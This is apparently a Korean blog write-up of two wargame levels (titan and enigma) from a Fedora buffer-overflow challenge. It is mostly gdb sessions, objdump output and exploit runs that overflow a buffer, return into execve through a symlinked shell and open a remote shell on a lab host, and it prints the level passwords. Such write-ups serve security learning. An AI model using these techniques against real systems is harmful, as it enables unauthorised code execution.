M4ndU의 만두만두한 블로그

ID | titan

PW | out of the night

0x08048471 <main+93>: lea    eax,[ebp-0x104]

0x08048477 <main+99>: mov    DWORD PTR [esp],eax

0x0804847a <main+102>: call   0x8048340 <puts@plt>

0x0804847f <main+107>: mov    eax,0x0

0x08048484 <main+112>: add    esp,0x114

0x0804848a <main+118>: pop    ecx

0x0804848b <main+119>: pop    ebp

0x0804848c <main+120>: lea    esp,[ecx-0x4]

0x0804848f <main+123>: ret   

[titan@Fedora_3rdFloor ~]$ cp balog balog2

[titan@Fedora_3rdFloor ~]$ vi ex.c

[titan@Fedora_3rdFloor ~]$ gcc -o ex ex.c

[titan@Fedora_3rdFloor ~]$ gdb -q ex

[titan@Fedora_3rdFloor ~]$ gdb -q balog

(no debugging symbols found)

(gdb) b main

Breakpoint 1 at 0x8048422

(gdb) r

Starting program: /home/titan/balog 

(no debugging symbols found)

(no debugging symbols found)

Breakpoint 1, 0x08048422 in main ()

Missing separate debuginfos, use: debuginfo-install glibc-2.9-3.i686

(gdb) p execve

$1 = {<text variable, no debug info>} 0x9ab7e0 <execve>

[titan@Fedora_3rdFloor ~]$ objdump -s balog | grep "01" --color=auto

 8048148 04000000 10000000 01000000 474e5500  ............GNU.

 804818c 02000000 06000000 01000000 05000000  ................

 80481bc 01000000 00000000 00000000 20000000  ............ ...

 8048272 00000000 02000200 02000200 0100      ..............  

 8048280 01000100 10000000 10000000 00000000  ................

 80482a0 b4960408 06010000                    ........        

 80482a8 c4960408 07010000 c8960408 07020000  ................

 80483c0 8d4201a3 e0960408 ff1485e0 9504088b  .B..............

 80483d0 15e09604 0839da72 e7c605dc 96040801  .....9.r........

 8048420 e55181ec 14010000 898df8fe ffff8b85  .Q..............

 8048480 00000000 81c41401 0000595d 8d61fcc3  ..........Y].a..

 80484e0 08890424 ff94b320 ffffff83 c60139fe  ...$... ......9.

 8048548 03000000 01000200 00000000 61726763  ............argc

 8048564 011b033b 18000000 02000000 2cffffff  ...;........,...

 8048580 14000000 00000000 017a5200 017c0801  .........zR..|..

 8048590 1b0c0404 88010000 18000000 1c000000  ................

 80495ec 01000000 10000000 0c000000 d0820408  ................

 804966c feffff6f 80820408 ffffff6f 01000000  ...o.......o....

 0010 32203230 30383131 30352028 52656420  2 20081105 (Red 

 0100 20486174 20342e33 2e322d37 2900       Hat 4.3.2-7).  

[titan@Fedora_3rdFloor ~]$ gdb -q balog

(no debugging symbols found)

(gdb) b main

Breakpoint 1 at 0x8048422

(gdb) r

Starting program: /home/titan/balog 

(no debugging symbols found)

(no debugging symbols found)

Breakpoint 1, 0x08048422 in main ()

Missing separate debuginfos, use: debuginfo-install glibc-2.9-3.i686

(gdb) x/x 0x080481bc   <--- execve() 첫번째 인자

0x80481bc: 0x00000001

(gdb) x/x 0x080481c0   <--- execve() 두 세번째 인자

0x80481c0: 0x00000000

[titan@Fedora_3rdFloor ~]$ vi sh.c

[titan@Fedora_3rdFloor ~]$ vi ex2.c

[titan@Fedora_3rdFloor ~]$ gcc -o sh sh.c 

[titan@Fedora_3rdFloor ~]$ ln -s sh `python -c 'print "\x01"'`

[titan@Fedora_3rdFloor ~]$ ls -al `python -c 'print "\x01"'`

lrwxrwxrwx 1 titan titan 2 2019-02-23 04:34 ? -> sh

[titan@Fedora_3rdFloor ~]$ ./ex2

��������������������������������������������������������������������������������������������������������������������������������

sh-3.2$ my-pass

euid = 500

out of the night

ID | enigma

PW | let me ride

(gdb) b *main+108

Breakpoint 1 at 0x8048561

(gdb) r

Starting program: /home/enigma/titan 

Reading symbols from shared object read from target memory...(no debugging symbols found)...done.

Loaded system supplied DSO at 0x612000

(no debugging symbols found)

(no debugging symbols found)

titan : What a tragic mistake.

you : AAAA

Breakpoint 1, 0x08048561 in main ()

(gdb) i r eax

eax            0xbf991764 -1080486044

(gdb) i r esp

esp            0xbf991740 0xbf991740

(gdb) p 0x64-0x40

$1 = 36

0x0804854a <main+85>: add    esp,0x10

0x0804854d <main+88>: mov    eax,ds:0x80497e4

0x08048552 <main+93>: sub    esp,0x4

0x08048555 <main+96>: push   eax

0x08048556 <main+97>: push   0x30

0x08048558 <main+99>: lea    eax,[ebp-52]

0x0804855b <main+102>: push   eax

0x0804855c <main+103>: call   0x80483c8

[enigma@Fedora_2ndFloor ~]$ vi find.c

[enigma@Fedora_2ndFloor ~]$ gcc -o find find.c 

[enigma@Fedora_2ndFloor ~]$ ./find 

"bin/sh" is at 0x8bd987

mandu@mandu-VirtualBox:~/ex_pwn$ python ex.py 

[+] Opening connection to 192.168.0.205 on port 8888: Done

titan : What a tragic mistake.

you :

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAJ\x85\x0

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAJ\x85\x0

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAJ\x85\x0

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAJ\x85\x0

AAAAAAAA��}\x00AAAA\x87ً\x00

[*] Switching to interactive mode

 $ 

$ my-pass

euid = 503

out of the night